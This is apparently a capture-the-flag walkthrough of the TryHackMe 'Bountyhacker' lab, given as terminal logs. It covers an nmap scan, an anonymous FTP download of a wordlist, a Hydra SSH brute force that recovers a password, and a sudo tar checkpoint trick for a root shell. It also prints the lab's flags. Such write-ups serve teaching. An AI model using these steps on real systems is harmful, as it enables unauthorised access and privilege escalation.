# Bountyhacker machine walkthrough
┌──(root㉿kali)-[/home/kali/thmmachine/bountyhacker]
└─# sudo nmap --top-ports 10 --open -oA nmap_light 10.10.80.62
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-19 11:32 EDT
Nmap scan report for 10.10.80.62
Host is up (0.19s latency).
Not shown: 7 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http


──(root㉿kali)-[/home/kali/thmmachine/bountyhacker]
└─# ftp 10.10.80.62  
Connected to 10.10.80.62.
220 (vsFTPd 3.0.3)
Name (10.10.80.62:kali): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||64301|)
dir
ftp: Can't connect to `10.10.80.62:64301': Connection timed out
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
-rw-rw-r--    1 ftp      ftp           418 Jun 07  2020 locks.txt
-rw-rw-r--    1 ftp      ftp            68 Jun 07  2020 task.txt
226 Directory send OK.
ftp> dir
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
-rw-rw-r--    1 ftp      ftp           418 Jun 07  2020 locks.txt
-rw-rw-r--    1 ftp      ftp            68 Jun 07  2020 task.txt
226 Directory send OK.
ftp> get locks.txt
local: locks.txt remote: locks.txt
200 EPRT command successful. Consider using EPSV.
150 Opening BINARY mode data connection for locks.txt (418 bytes).
100% |***********************************************************************|   418        3.90 KiB/s    00:00 ETA
226 Transfer complete.
418 bytes received in 00:00 (1.25 KiB/s)
ftp> get task.txt
local: task.txt remote: task.txt
200 EPRT command successful. Consider using EPSV.
150 Opening BINARY mode data connection for task.txt (68 bytes).
100% |***********************************************************************|    68        0.77 KiB/s    00:00 ETA
226 Transfer complete.
68 bytes received in 00:00 (0.23 KiB/s)
ftp> ls -la
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Jun 07  2020 .
drwxr-xr-x    2 ftp      ftp          4096 Jun 07  2020 ..
-rw-rw-r--    1 ftp      ftp           418 Jun 07  2020 locks.txt
-rw-rw-r--    1 ftp      ftp            68 Jun 07  2020 task.txt
226 Directory send OK.
ftp> exit
221 Goodbye.


                                                                                                                   
┌──(root㉿kali)-[/home/kali/thmmachine/bountyhacker]
└─# ls
locks.txt  nmap_light.gnmap  nmap_light.nmap  nmap_light.xml  task.txt

┌──(root㉿kali)-[/home/kali/thmmachine/bountyhacker]
└─# ls
exploit.py  locks.txt  nmap_light.gnmap  nmap_light.nmap  nmap_light.xml  pass.txt  task.txt
                                                                                                                    
┌──(root㉿kali)-[/home/kali/thmmachine/bountyhacker]
└─# grep -oP '\d{1,5}/open' nmap_light.gnmap | cut -d  "/" -f 1 | paste -s -d ','
21,22,80

                                                                                                                    
┌──(root㉿kali)-[/home/kali/thmmachine/bountyhacker]
└─# cat locks.txt 
rEddrAGON
ReDdr4g0nSynd!cat3
Dr@gOn$yn9icat3
R3DDr46ONSYndIC@Te
ReddRA60N
R3dDrag0nSynd1c4te
dRa6oN5YNDiCATE
ReDDR4g0n5ynDIc4te
R3Dr4gOn2044
RedDr4gonSynd1cat3
R3dDRaG0Nsynd1c@T3
Synd1c4teDr@g0n
reddRAg0N
REddRaG0N5yNdIc47e
Dra6oN$yndIC@t3
4L1mi6H71StHeB357
rEDdragOn$ynd1c473
DrAgoN5ynD1cATE
ReDdrag0n$ynd1cate
Dr@gOn$yND1C4Te
RedDr@gonSyn9ic47e
REd$yNdIc47e
dr@goN5YNd1c@73
rEDdrAGOnSyNDiCat3
r3ddr@g0N
ReDSynd1ca7e
                                                                                                                    
┌──(root㉿kali)-[/home/kali/thmmachine/bountyhacker]
└─# cat task.txt 
1.) Protect Vicious.
2.) Plan for Red Eye pickup on the moon.

-lin


┌──(root㉿kali)-[/home/kali/thmmachine/bountyhacker]
└─# hydra -l lin -P locks.txt 10.10.80.62 ssh                          
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-08-19 11:58:39
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 26 login tries (l:1/p:26), ~2 tries per task
[DATA] attacking ssh://10.10.80.62:22/
[22][ssh] host: 10.10.80.62   login: lin   password: RedDr4gonSynd1cat3
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-08-19 11:58:45

ssh lin@10.10.80.62
password- RedDr4gonSynd1cat3

cat user.txt
THM{CR1M3_SyNd1C4T3}

privilege escalation -----

lin@bountyhacker:/$ sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
[sudo] password for lin: 
Sorry, try again.
[sudo] password for lin: 
Sorry, try again.
[sudo] password for lin: 
sudo: 3 incorrect password attempts
lin@bountyhacker:/$ sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
[sudo] password for lin: 
tar: Removing leading `/' from member names
# id
uid=0(root) gid=0(root) groups=0(root)
# ls
bin   cdrom  etc   initrd.img      lib    lost+found  mnt  proc  run   snap  sys  usr  vmlinuz
boot  dev    home  initrd.img.old  lib64  media       opt  root  sbin  srv   tmp  var  vmlinuz.old
# cd root
# ls
root.txt
# cat root.txt
THM{80UN7Y_h4cK3r}


